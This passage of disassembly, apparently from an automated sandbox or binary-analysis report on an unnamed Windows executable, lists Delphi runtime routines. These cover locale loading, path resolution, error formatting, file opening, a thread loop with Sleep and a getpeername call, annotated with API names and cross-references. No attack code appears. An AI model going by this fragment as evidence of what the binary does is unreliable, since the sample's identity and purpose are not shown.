004295F5 mov dword ptr fs:[eax], esp
004295F8 cmp dword ptr [ebp-10h], 00000000h
004295FC je 004296FAh
00429602 cmp dword ptr [0042DA74h], 00000000h
00429609 jng 004296FAh
0042960F cmp dword ptr [0042DA68h], 00000000h
00429616 jne 004296FAh
0042961C mov edx, dword ptr [ebp-10h]
0042961F mov eax, dword ptr [0042DA80h] 00000000
00429624 mov ecx, dword ptr [eax]
00429626 call dword ptr [ecx+2Ch]
00429629 mov eax, dword ptr [0042DA80h] 00000000
0042962E mov edx, dword ptr [eax]
00429630 call dword ptr [edx+14h]
00429633 mov dword ptr [0042DA70h], eax
00429638 mov eax, dword ptr [0042DA80h] 00000000
0042963D mov edx, dword ptr [eax]
0042963F call dword ptr [edx+14h]
00429642 test eax, eax
00429644 jng 004296EEh
0042964A xor eax, eax
0042964C mov dword ptr [0042DA68h], eax
00429651 mov dword ptr [0042DA78h], 00000001h
0042965B xor eax, eax
0042965D mov dword ptr [0042DA7Ch], eax
00429662 mov eax, dword ptr [0042DA6Ch] 00000000
00429667 cmp eax, dword ptr [0042DA74h] 00000000
0042966D jnl 00429704h
00429673 xor eax, eax xrefs 004296EA
00429675 push ebp
00429676 push 004296C9h
0042967B push dword ptr fs:[eax]
0042967E mov dword ptr fs:[eax], esp
00429681 cmp dword ptr [0042DA7Ch], 01h
00429688 jne 0042969Ah
0042968A push 00000001h xrefs 00429698
0042968C call 00421B84h
00429691 cmp dword ptr [0042DA7Ch], 01h
00429698 je 0042968Ah
0042969A mov dword ptr [0042DA7Ch], 00000001h xrefs 00429688
004296A4 xor ecx, ecx
004296A6 mov dl, 01h
004296A8 mov eax, dword ptr [00421B0Ch] 00421B58
004296AD call 00413184h
004296B2 mov edx, dword ptr [0042DA6Ch] 00000000
004296B8 mov dword ptr [0042CAC8h+edx*4], eax
004296BF xor eax, eax
004296C1 pop edx
004296C3 pop ecx Count = 2
004296C4 mov dword ptr fs:[eax], edx
004296C7 jmp 004296D9h
004296D9 inc dword ptr [0042DA6Ch] xrefs 004296C7
004296DF mov eax, dword ptr [0042DA6Ch] 00000000
004296E4 cmp eax, dword ptr [0042DA74h] 00000000
004296EA jl 00429673h
004296EC jmp 00429704h
004296EE mov dword ptr [0042DA68h], 00000001h xrefs 00429644
004296F8 jmp 00429704h
004296FA mov dword ptr [0042DA68h], 00000001h xrefs 004295FC, 00429609, 00429616
00429704 xor eax, eax xrefs 004296F8, 0042966D, 004296EC
00429706 pop edx
00429708 pop ecx Count = 2
00429709 mov dword ptr fs:[eax], edx
0042970C jmp 00429734h
00429724 mov dword ptr [0042DA68h], 00000001h xrefs 004292B0
0042972E mov eax, dword ptr [ebp-0Ch]
00429731 mov dword ptr [ebp-08h], eax
00429734 mov dl, 01h xrefs 0042970C, 00429722
00429736 mov eax, dword ptr [ebp-04h]
00429739 mov ecx, dword ptr [eax]
0042973B call dword ptr [ecx-04h]
0042973E xor eax, eax
00429740 pop edx
00429742 pop ecx Count = 2
00429743 mov dword ptr fs:[eax], edx
00429746 jmp 00429752h
00429752 imul eax, dword ptr [ebp-08h], 000003E7h xrefs 00429746
00429759 push eax
0042975A call 00421B84h Sleep@KERNEL32.DLL (Hidden Import)
0042975F jmp 00429260h
Function 004026C8, API count: 0, instr count: 14
Address Instruction Meta Information
004026C8 push ebx xrefs 004043A1, 004044AC, 00405186, 00407BD0, 004057A4, 004036AA, 0040726A
004026C9 test eax, eax
004026CB jle 004026E2h
004026CD call dword ptr [0042B044h]
004026D3 mov ebx, eax
004026D5 test ebx, ebx
004026D7 jne 004026E4h
004026D9 mov al, 01h
004026DB call 004027E4h
004026E0 jmp 004026E4h
004026E2 xor ebx, ebx xrefs 004026CB
004026E4 mov eax, ebx xrefs 004026D7, 004026E0
004026E6 pop ebx
004026E7 ret function end
Function 00402A1C, API count: 2, instr count: 15
APIs
  • QueryPerformanceCounter.KERNEL32, ref: 00402A20
  • GetTickCount.KERNEL32, ref: 00402A34
Address Instruction Meta Information
00402A1C add esp, FFFFFFF8h xrefs 0042925B, 00429DB1
00402A1F push esp
00402A20 call 00401308h QueryPerformanceCounter@KERNEL32.DLL (Hidden Import)
00402A25 test eax, eax
00402A27 je 00402A34h
00402A29 mov eax, dword ptr [esp]
00402A2C mov dword ptr [0042B008h], eax
00402A31 pop ecx
00402A32 pop edx
00402A33 ret function end
00402A34 call 00401310h GetTickCount@KERNEL32.DLL (Hidden Import) xrefs 00402A27
00402A39 mov dword ptr [0042B008h], eax
00402A3E pop ecx
00402A3F pop edx
00402A40 ret function end
Function 00405D80, API count: 1, instr count: 31
APIs
  • LoadStringA.USER32, ref: 00405DB1
Address Instruction Meta Information
00405D80 push ebx xrefs 0040A9F3, 0040A1AE, 0040AB91, 0040ABBC, 0040AD35, 0040AE4D, 0040ADF1, 0040AD26, 0040AF20, 0040A99E, 0040411A, 0040D387, 0040D41B, 0040D477, 0040D50B, 0040D567, 0040D697, 0040D6BD, 0040D709, 0040D72F, 0040D7A4, 0040D671, 0040D641, 0040D6E3, 0040D752, 0040D84F, 0041067A, 00410E85
00405D81 push esi
00405D82 add esp, FFFFFC00h
00405D88 mov esi, edx
00405D8A mov ebx, eax
00405D8C test ebx, ebx
00405D8E je 00405DCDh
00405D90 cmp dword ptr [ebx+04h], 00010000h
00405D97 jnl 00405DC3h
00405D99 push 00000400h
00405D9E lea eax, dword ptr [esp+04h]
00405DA2 push eax
00405DA3 mov eax, dword ptr [ebx+04h]
00405DA6 push eax
00405DA7 mov eax, dword ptr [ebx]
00405DA9 mov eax, dword ptr [eax]
00405DAB call 00405328h
00405DB0 push eax
00405DB1 call 00401288h LoadStringA@USER32.DLL (Hidden Import)
00405DB6 mov ecx, eax
00405DB8 mov edx, esp
00405DBA mov eax, esi
00405DBC call 004044CCh
00405DC1 jmp 00405DCDh
00405DC3 mov eax, esi xrefs 00405D97
00405DC5 mov edx, dword ptr [ebx+04h]
00405DC8 call 004045D4h
00405DCD add esp, 00000400h xrefs 00405D8E, 00405DC1
00405DD3 pop esi
00405DD4 pop ebx
00405DD5 ret function end
Function 00404064, API count: 0, instr count: 37
Address Instruction Meta Information
00404064 push ebp xrefs 004040FE
00404065 mov ebp, esp
00404067 push ebx
00404068 push esi
00404069 push edi
0040406A mov eax, dword ptr [0042C638h] 00429CC0
0040406F test eax, eax
00404071 je 004040BEh
00404073 mov esi, dword ptr [eax]
00404075 xor ebx, ebx
00404077 mov edi, dword ptr [eax+04h]
0040407A xor edx, edx
0040407C push ebp
0040407D push 004040AAh
00404082 push dword ptr fs:[edx]
00404085 mov dword ptr fs:[edx], esp
00404088 cmp esi, ebx
0040408A jle 004040A0h
0040408C mov eax, dword ptr [edi+ebx*8] xrefs 0040409E
0040408F inc ebx
00404090 mov dword ptr [0042C63Ch], ebx
00404096 test eax, eax
00404098 je 0040409Ch
0040409A call eax
0040409C cmp esi, ebx xrefs 00404098
0040409E jnle 0040408Ch
004040A0 xor eax, eax xrefs 0040408A
004040A2 pop edx
004040A4 pop ecx Count = 2
004040A5 mov dword ptr fs:[eax], edx
004040A8 jmp 004040BEh
004040BE pop edi xrefs 00404071, 004040A8
004040BF pop esi
004040C0 pop ebx
004040C1 pop ebp
004040C2 ret function end
Function 0040A394, API count: 1, instr count: 50
APIs
    • GetLocaleInfoA.KERNEL32, ref: 0040A12A
  • EnumCalendarInfoA.KERNEL32, ref: 0040A3E7
Address Instruction Meta Information
0040A394 push ebp xrefs 0040B7F1
0040A395 mov ebp, esp
0040A397 push 00000000h
0040A399 push esi
0040A39A xor eax, eax
0040A39C push ebp
0040A39D push 0040A42Bh
0040A3A2 push dword ptr fs:[eax]
0040A3A5 mov dword ptr fs:[eax], esp
0040A3A8 lea eax, dword ptr [ebp-04h]
0040A3AB push eax
0040A3AC call 004061ECh
0040A3B1 mov ecx, 0040A440h
0040A3B6 mov edx, 0000100Bh
0040A3BB call 0040A10Ch
0040A3C0 mov eax, dword ptr [ebp-04h]
0040A3C3 mov edx, 00000001h
0040A3C8 call 00407608h
0040A3CD mov esi, eax
0040A3CF mov eax, esi
0040A3D1 add eax, FFFFFFFDh
0040A3D4 sub eax, 03h
0040A3D7 jnc 0040A415h
0040A3D9 push 00000004h
0040A3DB push esi
0040A3DC call 004061ECh
0040A3E1 push eax
0040A3E2 push 0040A2E0h
0040A3E7 call 00406124h EnumCalendarInfoA@KERNEL32.DLL (Hidden Import)
0040A3EC mov edx, 00000007h
0040A3F1 mov eax, 0042C764h
0040A3F6 mov dword ptr [eax], FFFFFFFFh xrefs 0040A400
0040A3FC add eax, 04h
0040A3FF dec edx
0040A400 jne 0040A3F6h
0040A402 push 00000003h
0040A404 push esi
0040A405 call 004061ECh
0040A40A push eax
0040A40B push 0040A31Ch
0040A410 call 00406124h
0040A415 xor eax, eax xrefs 0040A3D7
0040A417 pop edx
0040A419 pop ecx Count = 2
0040A41A mov dword ptr fs:[eax], edx
0040A41D push 0040A432h
0040A422 lea eax, dword ptr [ebp-04h] xrefs 0040A430
0040A425 call 004043DCh
0040A42A ret function end
Function 0040551C, API count: 4, instr count: 184
APIs
    • GetModuleHandleA.KERNEL32, ref: 00405381
    • GetProcAddress.KERNEL32, ref: 00405392
    • lstrcpyn.KERNEL32, ref: 00405426
    • FindFirstFileA.KERNEL32, ref: 0040546E
    • FindClose.KERNEL32, ref: 0040547B
    • lstrlen.KERNEL32, ref: 00405487
  • GetModuleFileNameA.KERNEL32, ref: 00405538
  • GetThreadLocale.KERNEL32, ref: 00405645
  • GetLocaleInfoA.KERNEL32, ref: 0040564B
  • LoadLibraryExA.KERNEL32, ref: 00405705
Strings
  • Software\Borland\Locales, va: 0040574C
  • Software\Borland\Delphi\Locales, va: 00405768
Address Instruction Meta Information
0040551C push ebp xrefs 00405307
0040551D mov ebp, esp
0040551F add esp, FFFFFEE0h
00405525 push ebx
00405526 push esi
00405527 mov dword ptr [ebp-04h], eax
0040552A push 00000105h
0040552F lea eax, dword ptr [ebp-0000011Dh]
00405535 push eax
00405536 push 00000000h
00405538 call 00401258h GetModuleFileNameA@KERNEL32.DLL (Hidden Import)
0040553D mov byte ptr [ebp-12h], 00000000h
00405541 lea eax, dword ptr [ebp-08h]
00405544 push eax
00405545 push 000F0019h
0040554A push 00000000h
0040554C push 0040574Ch ASCII "Software\Borland\Locales"
00405551 push 80000001h
00405556 call 004012B0h
0040555B test eax, eax
0040555D je 0040559Fh
0040555F lea eax, dword ptr [ebp-08h]
00405562 push eax
00405563 push 000F0019h
00405568 push 00000000h
0040556A push 0040574Ch ASCII "Software\Borland\Locales"
0040556F push 80000002h
00405574 call 004012B0h
00405579 test eax, eax
0040557B je 0040559Fh
0040557D lea eax, dword ptr [ebp-08h]
00405580 push eax
00405581 push 000F0019h
00405586 push 00000000h
00405588 push 00405768h ASCII "Software\Borland\Delphi\Locales"
0040558D push 80000001h
00405592 call 004012B0h
00405597 test eax, eax
00405599 jne 00405628h
0040559F xor eax, eax xrefs 0040555D, 0040557B
004055A1 push ebp
004055A2 push 00405621h
004055A7 push dword ptr fs:[eax]
004055AA mov dword ptr fs:[eax], esp
004055AD mov dword ptr [ebp-18h], 00000005h
004055B4 lea eax, dword ptr [ebp-0000011Dh]
004055BA mov edx, 00000105h
004055BF call 00405364h
004055C4 lea eax, dword ptr [ebp-18h]
004055C7 push eax
004055C8 lea eax, dword ptr [ebp-12h]
004055CB push eax
004055CE push 00000000h Count = 2
004055D0 lea eax, dword ptr [ebp-0000011Dh]
004055D6 push eax
004055D7 mov eax, dword ptr [ebp-08h]
004055DA push eax
004055DB call 004012B8h
004055E0 test eax, eax
004055E2 je 00405606h
004055E4 lea eax, dword ptr [ebp-18h]
004055E7 push eax
004055E8 lea eax, dword ptr [ebp-12h]
004055EB push eax
004055EE push 00000000h Count = 2
004055F0 push 00405788h
004055F5 mov eax, dword ptr [ebp-08h]
004055F8 push eax
004055F9 call 004012B8h
004055FE test eax, eax
00405600 je 00405606h
00405602 mov byte ptr [ebp-12h], 00000000h
00405606 mov byte ptr [ebp-0Eh], 00000000h xrefs 004055E2, 00405600
0040560A xor eax, eax
0040560C pop edx
0040560E pop ecx Count = 2
0040560F mov dword ptr fs:[eax], edx
00405612 push 00405628h
00405617 mov eax, dword ptr [ebp-08h] xrefs 00405626
0040561A push eax
0040561B call 004012A8h
00405620 ret function end
00405628 push 00000105h xrefs 00405599
0040562D mov eax, dword ptr [ebp-04h]
00405630 push eax
00405631 lea eax, dword ptr [ebp-0000011Dh]
00405637 push eax
00405638 call 00401290h
0040563D push 00000005h
0040563F lea eax, dword ptr [ebp-0Dh]
00405642 push eax
00405643 push 00000003h
00405645 call 00401278h GetThreadLocale@KERNEL32.DLL (Hidden Import)
0040564A push eax
0040564B call 00401250h GetLocaleInfoA@KERNEL32.DLL (Hidden Import)
00405650 xor esi, esi
00405652 cmp byte ptr [ebp-0000011Dh], 00000000h
00405659 je 00405742h
0040565F cmp byte ptr [ebp-0Dh], 00000000h
00405663 jne 0040566Fh
00405665 cmp byte ptr [ebp-12h], 00000000h
00405669 je 00405742h
0040566F lea eax, dword ptr [ebp-0000011Dh] xrefs 00405663
00405675 push eax
00405676 call 00401298h
0040567B mov ebx, eax
0040567D lea eax, dword ptr [ebp-0000011Dh]
00405683 add ebx, eax
00405685 jmp 00405688h
00405687 dec ebx xrefs 00405695
00405688 cmp byte ptr [ebx], 0000002Eh xrefs 00405685
0040568B je 00405697h
0040568D lea eax, dword ptr [ebp-0000011Dh]
00405693 cmp ebx, eax
00405695 jne 00405687h
00405697 lea eax, dword ptr [ebp-0000011Dh] xrefs 0040568B
0040569D cmp ebx, eax
0040569F je 00405742h
004056A5 inc ebx
004056A6 cmp byte ptr [ebp-12h], 00000000h
004056AA je 004056D4h
004056AC mov edx, ebx
004056AE sub edx, eax
004056B0 mov eax, 00000105h
004056B5 sub eax, edx
004056B7 push eax
004056B8 lea eax, dword ptr [ebp-12h]
004056BB push eax
004056BC push ebx
004056BD call 00401290h
004056C2 push 00000002h
004056C4 push 00000000h
004056C6 lea eax, dword ptr [ebp-0000011Dh]
004056CC push eax
004056CD call 00401280h
004056D2 mov esi, eax
004056D4 test esi, esi xrefs 004056AA
004056D6 jne 00405742h
004056D8 cmp byte ptr [ebp-0Dh], 00000000h
004056DC je 00405742h
004056DE lea eax, dword ptr [ebp-0000011Dh]
004056E4 mov edx, ebx
004056E6 sub edx, eax
004056E8 mov eax, 00000105h
004056ED sub eax, edx
004056EF push eax
004056F0 lea eax, dword ptr [ebp-0Dh]
004056F3 push eax
004056F4 push ebx
004056F5 call 00401290h
004056FA push 00000002h
004056FC push 00000000h
004056FE lea eax, dword ptr [ebp-0000011Dh]
00405704 push eax
00405705 call 00401280h LoadLibraryExA@KERNEL32.DLL (Hidden Import)
0040570A mov esi, eax
0040570C test esi, esi
0040570E jne 00405742h
00405710 mov byte ptr [ebp-0Bh], 00000000h
00405714 lea eax, dword ptr [ebp-0000011Dh]
0040571A mov edx, ebx
0040571C sub edx, eax
0040571E mov eax, 00000105h
00405723 sub eax, edx
00405725 push eax
00405726 lea eax, dword ptr [ebp-0Dh]
00405729 push eax
0040572A push ebx
0040572B call 00401290h
00405730 push 00000002h
00405732 push 00000000h
00405734 lea eax, dword ptr [ebp-0000011Dh]
0040573A push eax
0040573B call 00401280h
00405740 mov esi, eax
00405742 mov eax, esi xrefs 00405659, 0040569F, 004056D6, 004056DC, 0040570E, 00405669
00405744 pop esi
00405745 pop ebx
00405746 mov esp, ebp
00405748 pop ebp
00405749 ret function end
Function 00413A38, API count: 1, instr count: 18
APIs
  • getpeername.WS2_32, ref: 00413A55
Address Instruction Meta Information
00413A38 push ebx xrefs 004185D5
00413A39 push esi
00413A3A push ecx
00413A3B mov ebx, edx
00413A3D mov esi, eax
00413A3F mov dword ptr [esp], 0000001Ch
00413A46 mov eax, ebx
00413A48 xor ecx, ecx
00413A4A mov edx, dword ptr [esp]
00413A4D call 00403030h
00413A52 push esp
00413A53 push ebx
00413A54 push esi
00413A55 call dword ptr [0042B430h] getpeername@WS2_32.DLL (Hidden Import)
00413A5B pop edx
00413A5C pop esi
00413A5D pop ebx
00413A5E ret function end
Function 00406038, API count: 1, instr count: 19
APIs
  • GetModuleHandleA.KERNEL32, ref: 00406044
Address Instruction Meta Information
00406038 push ebx xrefs 00429D9E
00406039 mov ebx, eax
0040603B xor eax, eax
0040603D mov dword ptr [0042B0C4h], eax
00406042 push 00000000h
00406044 call 00405F74h GetModuleHandleA@KERNEL32.DLL (Hidden Import)
00406049 mov dword ptr [0042C660h], eax
0040604E mov eax, dword ptr [0042C660h] 00400000
00406053 mov dword ptr [0042B0CCh], eax
00406058 xor eax, eax
0040605A mov dword ptr [0042B0D0h], eax
0040605F xor eax, eax
00406061 mov dword ptr [0042B0D4h], eax
00406066 call 0040602Ch
0040606B mov edx, 0042B0C8h
00406070 mov eax, ebx
00406072 call 004040C4h
00406077 pop ebx
00406078 ret function end
Function 00403094, API count: 1, instr count: 69
APIs
  • CreateFileA.KERNEL32, ref: 0040312F
Address Instruction Meta Information
00403094 push ebx xrefs 0040318A, 00403195
00403095 push esi
00403096 push edi
00403097 mov esi, edx
00403099 mov edi, ecx
0040309B xor edx, edx
0040309D mov ebx, eax
0040309F mov dx, word ptr [eax+04h]
004030A3 sub edx, 0000D7B0h
004030A9 je 004030C0h
004030AB cmp edx, 03h
004030AE ja 00403156h
004030B4 call dword ptr [ebx+24h]
004030B7 test eax, eax
004030B9 je 004030C0h
004030BB call 00402810h
004030C0 mov word ptr [ebx+04h], D7B3h xrefs 004030A9, 004030B9
004030C6 mov dword ptr [ebx+08h], esi
004030C9 mov dword ptr [ebx+24h], 0040306Ch
004030D0 mov dword ptr [ebx+1Ch], 00402AC0h
004030D7 cmp byte ptr [ebx+48h], 00000000h
004030DB je 0040313Dh
004030DD mov eax, C0000000h
004030E2 mov dl, byte ptr [0042B00Ch] 02
004030E8 and edx, 70h
004030EB shr edx, 02h
004030EE mov edx, dword ptr [edx+0042B06Ch]
004030F4 mov ecx, 00000002h
004030F9 sub edi, 03h
004030FC je 0040311Fh
004030FE mov ecx, 00000003h
00403103 inc edi
00403104 je 0040311Fh
00403106 mov eax, 40000000h
0040310B inc edi
0040310C mov word ptr [ebx+04h], D7B2h
00403112 je 0040311Fh
00403114 mov eax, 80000000h
00403119 mov word ptr [ebx+04h], D7B1h
0040311F push 00000000h xrefs 004030FC, 00403104, 00403112
00403121 push 00000080h
00403126 push ecx
00403127 push 00000000h
00403129 push edx
0040312A push eax
0040312B lea eax, dword ptr [ebx+48h]
0040312E push eax
0040312F call 004011A8h CreateFileA@KERNEL32.DLL (Hidden Import)
00403134 cmp eax, FFFFFFFFh xrefs 00403154
00403137 je 0040315Dh
00403139 mov dword ptr [ebx], eax
0040313B jmp 0040316Dh
0040313D mov dword ptr [ebx+24h], 00402AC0h xrefs 004030DB
00403144 cmp edi, 03h
00403147 je 0040314Dh
00403149 push FFFFFFF6h
0040314B jmp 0040314Fh
0040314D push FFFFFFF5h xrefs 00403147
0040314F call 004011C0h xrefs 0040314B
00403154 jmp 00403134h
00403156 mov eax, 00000066h xrefs 004030AE
0040315B jmp 00403168h
0040315D mov word ptr [ebx+04h], D7B0h xrefs 00403137
00403163 call 00401248h
00403168 call 00402810h xrefs 0040315B
0040316D pop edi xrefs 0040313B
0040316E pop esi
0040316F pop ebx
00403170 ret function end
Function 00405364, API count: 6, instr count: 136
APIs
    • CharNextA.USER32, ref: 00405353
  • GetModuleHandleA.KERNEL32, ref: 00405381
  • GetProcAddress.KERNEL32, ref: 00405392
  • lstrcpyn.KERNEL32, ref: 00405426
  • FindFirstFileA.KERNEL32, ref: 0040546E
  • FindClose.KERNEL32, ref: 0040547B
  • lstrlen.KERNEL32, ref: 00405487
Strings
  • kernel32.dll, va: 004054F8
  • GetLongPathNameA, va: 00405508
Address Instruction Meta Information
00405364 push ebp xrefs 004055BF
00405365 mov ebp, esp
00405367 add esp, FFFFFDB0h
0040536D push ebx
0040536E push esi
0040536F push edi
00405370 mov dword ptr [ebp-08h], edx
00405373 mov dword ptr [ebp-04h], eax
00405376 mov eax, dword ptr [ebp-04h]
00405379 mov dword ptr [ebp-0Ch], eax
0040537C push 004054F8h ASCII "kernel32.dll"
00405381 call 00401260h GetModuleHandleA@KERNEL32.DLL (Hidden Import)
00405386 mov esi, eax
00405388 test esi, esi
0040538A je 004053CCh
0040538C push 00405508h ASCII "GetLongPathNameA"
00405391 push esi
00405392 call 00401268h GetProcAddress@KERNEL32.DLL (Import)
00405397 mov ebx, eax
00405399 test ebx, ebx
0040539B je 004053CCh
0040539D push 00000105h
004053A2 lea eax, dword ptr [ebp-0000024Fh]
004053A8 push eax
004053A9 mov eax, dword ptr [ebp-04h]
004053AC push eax
004053AD call ebx
004053AF test eax, eax
004053B1 je 004053CCh
004053B3 mov eax, dword ptr [ebp-08h]
004053B6 push eax
004053B7 lea eax, dword ptr [ebp-0000024Fh]
004053BD push eax
004053BE mov eax, dword ptr [ebp-04h]
004053C1 push eax
004053C2 call 00401290h
004053C7 jmp 004054EEh
004053CC mov eax, dword ptr [ebp-04h] xrefs 0040538A, 0040539B, 004053B1
004053CF cmp byte ptr [eax], 0000005Ch
004053D2 jne 0040540Ch
004053D4 mov eax, dword ptr [ebp-04h]
004053D7 cmp byte ptr [eax+01h], 0000005Ch
004053DB jne 004054EEh
004053E1 mov eax, dword ptr [ebp-04h]
004053E4 add eax, 02h
004053E7 call 00405350h
004053EC mov esi, eax
004053EE cmp byte ptr [esi], 00000000h
004053F1 je 004054EEh
004053F7 lea eax, dword ptr [esi+01h]
004053FA call 00405350h
004053FF mov esi, eax
00405401 cmp byte ptr [esi], 00000000h
00405404 je 004054EEh
0040540A jmp 00405412h
0040540C mov esi, dword ptr [ebp-04h] xrefs 004053D2
0040540F add esi, 02h
00405412 mov ebx, esi xrefs 0040540A
00405414 sub ebx, dword ptr [ebp-04h]
00405417 lea eax, dword ptr [ebx+01h]
0040541A push eax
0040541B mov eax, dword ptr [ebp-04h]
0040541E push eax
0040541F lea eax, dword ptr [ebp-0000024Fh]
00405425 push eax
00405426 call 00401290h lstrcpyn@KERNEL32.DLL (Hidden Import)
0040542B jmp 004054D1h
00405430 lea eax, dword ptr [esi+01h] xrefs 004054D4
00405433 call 00405350h
00405438 mov edi, eax
0040543A mov eax, edi
0040543C sub eax, esi
0040543E mov edx, eax
00405440 add edx, ebx
00405442 inc edx
00405443 cmp edx, 00000105h
00405449 jg 004054EEh
0040544F inc eax
00405450 push eax
00405451 push esi
00405452 lea eax, dword ptr [ebp-0000024Fh]
00405458 add eax, ebx
0040545A push eax
0040545B call 00401290h
00405460 lea eax, dword ptr [ebp-0000014Ah]
00405466 push eax
00405467 lea eax, dword ptr [ebp-0000024Fh]
0040546D push eax
0040546E call 00401230h FindFirstFileA@KERNEL32.DLL (Hidden Import)
00405473 mov esi, eax
00405475 cmp esi, FFFFFFFFh
00405478 je 004054EEh
0040547A push esi
0040547B call 00401228h FindClose@KERNEL32.DLL (Hidden Import)
00405480 lea eax, dword ptr [ebp-0000011Eh]
00405486 push eax
00405487 call 00401298h lstrlen@KERNEL32.DLL (Hidden Import)
0040548C lea edx, dword ptr [ebx+01h]
0040548F add eax, edx
00405491 inc eax
00405492 cmp eax, 00000105h
00405497 jnle 004054EEh
00405499 mov byte ptr [ebp+ebx-0000024Fh], 0000005Ch
004054A1 mov eax, 00000105h
004054A6 sub eax, ebx
004054A8 dec eax
004054A9 push eax
004054AA lea eax, dword ptr [ebp-0000011Eh]
004054B0 push eax
004054B1 lea eax, dword ptr [ebp-0000024Fh]
004054B7 add eax, ebx
004054B9 inc eax
004054BA push eax
004054BB call 00401290h
004054C0 lea eax, dword ptr [ebp-0000011Eh]
004054C6 push eax
004054C7 call 00401298h
004054CC inc eax
004054CD add ebx, eax
004054CF mov esi, edi
004054D1 cmp byte ptr [esi], 00000000h xrefs 0040542B
004054D4 jne 00405430h
004054DA mov eax, dword ptr [ebp-08h]
004054DD push eax
004054DE lea eax, dword ptr [ebp-0000024Fh]
004054E4 push eax
004054E5 mov eax, dword ptr [ebp-04h]
004054E8 push eax
004054E9 call 00401290h
004054EE mov eax, dword ptr [ebp-0Ch] xrefs 00405449, 00405478, 00405497, 004053DB, 004053F1, 00405404, 004053C7
004054F1 pop edi
004054F2 pop esi
004054F3 pop ebx
004054F4 mov esp, ebp
004054F6 pop ebp
004054F7 ret function end
Function 004059A4, API count: 1, instr count: 20
APIs
  • InterlockedDecrement.KERNEL32, ref: 004059B0
Address Instruction Meta Information
004059A4 push ebp
004059A5 mov ebp, esp
004059A7 push ebx
004059A8 push esi
004059A9 mov ebx, dword ptr [ebp+08h]
004059AC lea eax, dword ptr [ebx+04h]
004059AF push eax
004059B0 call 004012F0h InterlockedDecrement@KERNEL32.DLL (Hidden Import)
004059B5 mov esi, eax
004059B7 test esi, esi
004059B9 jne 004059C4h
004059BB mov dl, 01h
004059BD mov eax, ebx
004059BF mov ecx, dword ptr [eax]
004059C1 call dword ptr [ecx-04h]
004059C4 mov eax, esi xrefs 004059B9
004059C6 pop esi
004059C7 pop ebx
004059C8 pop ebp
004059C9 retn 0004h function end
Function 0040BB40, API count: 1, instr count: 49
APIs
    • FormatMessageA.KERNEL32, ref: 0040A0DF
  • RtlGetLastWin32Error.NTDLL, ref: 0040BB5A
Address Instruction Meta Information
0040BB40 push ebp xrefs 0040BBE3, 00412ECC
0040BB41 mov ebp, esp
0040BB43 add esp, FFFFFFECh
0040BB46 push ebx
0040BB47 xor eax, eax
0040BB49 mov dword ptr [ebp-14h], eax
0040BB4C xor eax, eax
0040BB4E push ebp
0040BB4F push 0040BBD0h
0040BB54 push dword ptr fs:[eax]
0040BB57 mov dword ptr fs:[eax], esp
0040BB5A call 004061ACh RtlGetLastWin32Error@NTDLL.DLL (Hidden Import)
0040BB5F mov ebx, eax
0040BB61 test ebx, ebx
0040BB63 je 0040BB9Ch
0040BB65 mov dword ptr [ebp-10h], ebx
0040BB68 mov byte ptr [ebp-0Ch], 00000000h
0040BB6C lea edx, dword ptr [ebp-14h]
0040BB6F mov eax, ebx
0040BB71 call 0040A0C0h
0040BB76 mov eax, dword ptr [ebp-14h]
0040BB79 mov dword ptr [ebp-08h], eax
0040BB7C mov byte ptr [ebp-04h], 0000000Bh
0040BB80 lea eax, dword ptr [ebp-10h]
0040BB83 push eax
0040BB84 push 00000001h
0040BB86 mov ecx, dword ptr [0042B8D0h] 004064EC
0040BB8C mov dl, 01h
0040BB8E mov eax, dword ptr [00406FC8h] 00407014
0040BB93 call 0040A9C0h
0040BB98 mov edx, eax
0040BB9A jmp 0040BBB0h
0040BB9C mov ecx, dword ptr [0042B94Ch] 004064F4 xrefs 0040BB63
0040BBA2 mov dl, 01h
0040BBA4 mov eax, dword ptr [00406FC8h] 00407014
0040BBA9 call 0040A984h
0040BBAE mov edx, eax
0040BBB0 mov dword ptr [edx+0Ch], ebx xrefs 0040BB9A
0040BBB3 mov eax, edx
0040BBB5 call 00403DB8h
0040BBBA xor eax, eax
0040BBBC pop edx
0040BBBE pop ecx Count = 2
0040BBBF mov dword ptr fs:[eax], edx
0040BBC2 push 0040BBD7h
0040BBC7 lea eax, dword ptr [ebp-14h] xrefs 0040BBD5
0040BBCA call 004043DCh
0040BBCF ret function end
Function 0040A0C0, API count: 1, instr count: 28
APIs
  • FormatMessageA.KERNEL32, ref: 0040A0DF
Address Instruction Meta Information
0040A0C0 push ebx xrefs 0040BB71, 0040D787, 00412366, 00412301, 004131EC, 004132ED
0040A0C1 add esp, FFFFFF00h
0040A0C7 mov ebx, edx
0040A0C9 push 00000000h
0040A0CB push 00000100h
0040A0D0 lea edx, dword ptr [esp+08h]
0040A0D4 push edx
0040A0D5 push 00000000h
0040A0D7 push eax
0040A0D8 push 00000000h
0040A0DA push 00003200h
0040A0DF call 0040614Ch FormatMessageA@KERNEL32.DLL (Hidden Import)
0040A0E4 jmp 0040A0E7h
0040A0E6 dec eax xrefs 0040A0F2, 0040A0F7
0040A0E7 test eax, eax xrefs 0040A0E4
0040A0E9 jle 0040A0F9h
0040A0EB mov dl, byte ptr [esp+eax-01h]
0040A0EF sub dl, 00000021h
0040A0F2 jc 0040A0E6h
0040A0F4 sub dl, 0000000Dh
0040A0F7 je 0040A0E6h
0040A0F9 mov edx, esp xrefs 0040A0E9
0040A0FB mov ecx, ebx
0040A0FD xchg eax, ecx
0040A0FE call 004044CCh
0040A103 add esp, 00000100h
0040A109 pop ebx
0040A10A ret function end
Function 00404004, API count: 0, instr count: 37
Address Instruction Meta Information
00404004 push ebp xrefs 004042C1, 0040404F, 004040AF
00404005 mov ebp, esp
00404007 push ebx
00404008 push esi
00404009 push edi
0040400A mov edi, 0042C630h
0040400F mov eax, dword ptr [edi+08h]
00404012 test eax, eax
00404014 je 0040405Eh
00404016 mov ebx, dword ptr [edi+0Ch]
00404019 mov esi, dword ptr [eax+04h]
0040401C xor edx, edx
0040401E push ebp
0040401F push 0040404Ah
00404024 push dword ptr fs:[edx]
00404027 mov dword ptr fs:[edx], esp
0040402A test ebx, ebx
0040402C jle 00404040h
0040402E dec ebx xrefs 0040403E
0040402F mov dword ptr [edi+0Ch], ebx
00404032 mov eax, dword ptr [esi+ebx*8+04h]
00404036 test eax, eax
00404038 je 0040403Ch
0040403A call eax
0040403C test ebx, ebx xrefs 00404038
0040403E jnle 0040402Eh
00404040 xor eax, eax xrefs 0040402C
00404042 pop edx
00404044 pop ecx Count = 2
00404045 mov dword ptr fs:[eax], edx
00404048 jmp 0040405Eh
0040405E pop edi xrefs 00404014, 00404048
0040405F pop esi
00404060 pop ebx
00404061 pop ebp
00404062 ret function end
